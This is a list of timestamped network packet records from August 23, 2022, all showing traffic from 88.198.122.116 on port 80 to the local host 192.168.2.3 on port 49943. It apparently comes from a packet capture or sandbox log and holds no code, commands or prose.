Aug 23, 2022 18:25:29.400862932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400914907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400938034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400959015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.400980949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401005030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401027918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401047945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401115894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401139021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401161909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401181936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401202917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401226044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401263952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401284933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401304960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401325941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401350975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401376963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401401997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401423931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401447058 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401468039 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401493073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401515961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401537895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401560068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401582956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401606083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401628017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401650906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401673079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401694059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401715994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401736021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401758909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401781082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401804924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401827097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401848078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401869059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401890993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401911974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401932955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401956081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.401993990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402017117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402059078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402081966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402103901 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402127028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402149916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402172089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402194977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402218103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402240992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402261972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402283907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402308941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402332067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402353048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402374983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402399063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402420998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402442932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402462959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402483940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402506113 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402542114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402565956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402589083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402609110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402684927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402707100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402729034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402751923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402816057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402848959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402879953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402904987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402930021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402955055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.402980089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403004885 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403028965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403053045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403074980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403099060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403120995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403146982 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403184891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403211117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403234005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403278112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403299093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403321028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403342009 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403382063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403405905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403430939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403453112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403474092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403495073 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403515100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403536081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403557062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403575897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403597116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403616905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403639078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403659105 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403681993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403704882 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403727055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403748035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403769016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403788090 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403809071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403830051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403851986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403872967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403893948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403914928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403938055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403958082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.403979063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404000998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404025078 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404047012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404067993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404088974 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404110909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404135942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404159069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404189110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404212952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404239893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404262066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404285908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404310942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404334068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404359102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404382944 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404406071 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404475927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404500961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404525995 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404548883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404573917 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404597998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404620886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404643059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404664993 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404696941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404721975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404743910 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404767036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404797077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404820919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404844999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404872894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404902935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404927015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404949903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404973984 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.404997110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405020952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405045033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405067921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405092955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405116081 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405139923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405164957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405189991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405215025 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405242920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405664921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405692101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405723095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405786037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405812979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405844927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405867100 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405889988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405910015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405931950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405952930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405973911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.405994892 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406017065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406043053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406064987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406086922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406110048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406135082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406157017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406181097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406203985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406224012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406249046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406274080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406296968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406368971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406394005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406418085 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406440973 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406500101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406531096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406558037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406582117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406605959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406629086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406653881 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406682014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406704903 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406728983 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406752110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406775951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406802893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406825066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406847000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406868935 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406896114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406913042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406934977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406956911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.406979084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407001019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407023907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407046080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407068968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407088041 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407104969 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407129049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407151937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407174110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407201052 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407226086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407248020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407273054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407296896 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407319069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407341957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407386065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407408953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407433033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407455921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407475948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407497883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407520056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407541990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407562017 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407582998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407604933 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407625914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407648087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407670021 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407686949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407702923 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407726049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407747030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407768011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407788992 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407812119 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407829046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407852888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407876015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407897949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407921076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407943010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407963991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.407984018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408006907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408029079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408050060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408066988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408090115 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408112049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408134937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408157110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408179998 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408204079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408224106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408246994 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408267975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408288956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408312082 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408333063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408354044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408375978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408396006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408417940 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408437967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408458948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408480883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408503056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408524990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408546925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408569098 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408592939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408615112 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408636093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408658028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408679008 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408699989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408723116 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408744097 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408766985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408788919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408813953 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408837080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408864975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408889055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408911943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408932924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408953905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408974886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.408999920 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409019947 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409043074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409066916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409090042 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409111977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409132957 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409153938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409177065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409202099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409225941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409251928 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409274101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409296989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409322977 CEST	80	49943	88.198.122.116	192.168.2.3
